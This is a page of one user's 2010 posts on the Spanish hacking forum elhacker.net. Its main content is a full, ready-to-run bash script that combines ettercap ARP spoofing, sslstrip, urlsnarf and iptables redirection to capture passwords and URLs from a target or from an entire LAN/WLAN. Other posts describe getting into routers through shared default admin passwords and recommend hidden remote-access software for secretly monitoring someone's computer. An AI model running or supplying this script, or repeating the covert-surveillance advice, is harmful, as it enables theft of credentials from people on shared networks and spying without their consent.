elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Tutorial básico de Quickjs


  Mostrar Mensajes
Páginas: 1 [2] 3
11  Seguridad Informática / Hacking / Re: ¿Como se emulan las llaves lpt (hardlock aladdin)? en: 18 Diciembre 2010, 06:04 am
No tengo conocimiento sobre el tema pero encontre esto, talvez te ayude

http://www.taringa.net/posts/apuntes-y-monografias/5348535/Emulando-una-Dongle-Hardlock.html
12  Seguridad Informática / Hacking / Es posible detectar un ataque mitm? en: 5 Diciembre 2010, 00:34 am
Quisiera saber si es posible detectar un ataque mitm o un arp poisoning y si es posible como?
13  Seguridad Informática / Hacking / Re: Nuevo! hack x crack cuadernos 2010 en: 4 Diciembre 2010, 16:26 pm
ya esta :huh: no se que paso, pero grax
14  Seguridad Informática / Hacking / Re: Nuevo! hack x crack cuadernos 2010 en: 4 Diciembre 2010, 16:11 pm
 :o Que buena publicacion gacias.. pero no puedo descargar el archivo :P
15  Seguridad Informática / Hacking / Re: Proyecto de Videotutoriales en: 4 Diciembre 2010, 15:10 pm
Como he visto que nadie agradece los post que uno hace y a mi me gustaria que agradecieran los mios, te doy las gracias....

GRACIAS por tu aportacion, es bueno que sigas aportando.... ;-)  :laugh:  :rolleyes:
16  Seguridad Informática / Hacking / Scrip para Sniffear pass y datos sobre lan/wlan con ettercap, sslstrip, urlsnarf en: 1 Diciembre 2010, 06:31 am
Sniffeando contraseñas y datos sobre lan/wlan con ettercap, sslstrip, urlsnarf

(No vi nada en las reglas sobre esto, si estoy cometiendo alguna falta les pido disculpas y que el moderador corrija o borre el tema)

Encontre este articulo en un foro que proporciona una herramienta muy buena para hacer sniffing de datos sobre las redes lan/wan, fue publicado en el foro de bactrack-linux.org por Teddy Strand, y fue traducido con la herramienta microsoft translator y otras partes por mi persona, los codigos no fueron modificados para su correcta ejecucion.  

La publicacion es la siguiente:

Estoy cansado de escribir comandos indefinidamente mientras hago pentest a mi red. Así que empecé a escribir scritps para cualquier cosa que hago. Este script es el que utilizo en su mayoría.
Aún soy muy nuevo en BackTrack/Linux, pero esta secuencia de comandos realmente funciona para mí y seguro que otros principiantes pueden hacer buen uso de el.

En primer lugar, asegurate de que la configuracion de etter.conf  tenga el valor por defecto. Tu etter.conf se encuentra en /etc/etter.conf - esta sección debe permanecer comentada:
Código:
# if you use iptables: 
   #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
   #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

Esto es porque yo utilizo el ettercap para hacer el arpspoofing, pero no quiero que haga lo del certificado falso (tenemos el sslstrip para que haga el trabajo).

Guarda este código en un archivo de texto y nombralo como loquesea.sh (asegúrese de darle permisos de ejecutable con chmod +x loquesea.sh)

Código:
#!/bin/bash
echo -n "Do you want to execute Wireshark when done? If yes, LEAVE BLANK "
read -e NOYES
echo -n "Do you want to extract pictures from the pcap via tcpxtract? If yes, LEAVE BLANK "
read -e XTRACT
echo -n "What interface to use? ie wlan0: "
read -e IFACE
echo -n "Name of "Session"? (name of the folder that will be created with all the log files): "
read -e SESSION
echo -n "Gateway IP - LEAVE BLANK IF YOU WANT TO ARP WHOLE NETWORK: "
read -e ROUTER
echo -n "Target IP - LEAVE BLANK IF YOU WANT TO ARP WHOLE NETWORK: "
read -e VICTIM
mkdir /root/$SESSION/
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
sslstrip -p -k -w /root/$SESSION/$SESSION.log &
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
urlsnarf -i $IFACE | grep http > /root/$SESSION/$SESSION.txt &
ettercap -T -i $IFACE -w /root/$SESSION/$SESSION.pcap -L /root/$SESSION/$SESSION -M arp /$ROUTER/ /$VICTIM/
"$XTRACT"tcpxtract -f /root/$SESSION/$SESSION.pcap
"$NOYES"wireshark &
killall sslstrip
killall python
killall urlsnarf
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
etterlog -p -i /root/$SESSION/$SESSION.eci

Este script ejecutara sslstrip + archivo de registro, urlsnarf (devolviendo todas las urls a un archivo de texto), ettercap con arpspoofing + archivos de registro (con las contraseñas) + un archivo pcap (para un mayor analisis). Todos los archivos son puestos en el mismo folder, con nombres identicos (claro que con diferente extension).

Por otra parte al salir correctamente del script (y ettercap) con la tecla "q", el script limpiara todo el solo (saliendo de sslstrip, urlsnarf y vaciando el iptables). Por ultimo lee automáticamente las contraseñas desde el archivo de registro de ettercap (.eci) y se ejecuta wireshark para un mayor análisis.

Tip: Para mí, la forma más sencilla de cargar imágenes desde un archivo pcap (que genera el script), es mediante el uso de NetworkMiner para windows. Se ejecuta sin problemas a través de wine, si lo ajustas un poco como muestra de este tutorial:
http://geek00l.blogspot.com/2008/12/drunken-monkey-running-network-miner.html

Espero que les sea de ayuda.

Saludos
17  Seguridad Informática / Hacking / Re: Duda sobre Ip e intrusiones en: 1 Diciembre 2010, 04:56 am
bueno, la mayoria de proveedores de internet manejan los mismos equipos para brindarte el servicio (o por lo menos donde vivo  :rolleyes:) y por ende tienen la misma contraseña para el usuario administrador ojo que esta no es la misma que la de la red wifi, asi que al todos tener la misma contraseña puedes acceder facilmente a ellos y redireccionar uno o mas puertos a una pc, lo que sigue es lo que te habia explicado antes, ahora si es a un equipo que tenga otro tipo de router, la tienes mas dificil jajaja, por ahora estoy averiguando de como hacer un bypass de antivirus y de firewall, cuando lo consiga lo posteo en el foro.

Saludos.
18  Seguridad Informática / Hacking / Re: Capturar tráfico en mi propia red LAN (vigilancia juvenil) en: 30 Noviembre 2010, 16:51 pm
buscalo como Remote Anything, estoy seguro que llenara tus espectativas, y aclaro que las computadoras y el internet es el mejor recurso de investigacion que cualquiera pueda tener.

saludos
19  Seguridad Informática / Hacking / Re: Duda sobre Ip e intrusiones en: 30 Noviembre 2010, 04:41 am
Bueno no se si entendi bien tu pregunta, pero segun lo que entendi quieres saber como seria la forma que atacar o mejor dicho que te ataquen. en pocas palabras y sin terminos tecnicos supongamos que tu direccion publica es 216.12.34.34 que seria la del router o firewall segun sea el caso, es la que yo deberia de atacar primero, luego redirecciono los puertos a la ip de tu pc digamos que es la 192.168.1.2 y luego si quiero a la de tu hermano que seria 192.168.1.3, el redireccionamiento de puertos seria lo primero ya que sino solo atacaria el router sin lograr conseguir informacion de tu pc, y si yo estubiera en la misma red local, simplemente omito el paso del router ya que estubiera practicamente a un salto de tu direccion y de tu computadora y podria hacer un escaneo libre de puertos y vulnerabilidades. Espero que esto haya despejado tu duda y sino pues sigue investigando y lo posteas luego.

Saludos
20  Seguridad Informática / Hacking / Re: Capturar tráfico en mi propia red LAN (vigilancia juvenil) en: 30 Noviembre 2010, 04:09 am
Al igual  que la mayoria coincido con Apokliptico, pero tambien pienso que en vez de sniffear el trafico o utilizar un key logger podrias utilizar un programa de conexion remota como el master y slave, no recuerdo de que compañia es, con el puedes ver lo que esta haciendo en tiempo real y muchas cosas mas, solamente configuras el slave para que no se muestre en la bandeja y listo, pero ten mucho cuidado ya que podrias enterarte de cosas que no te gusten al espiar a los demas.

saludos
Páginas: 1 [2] 3
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines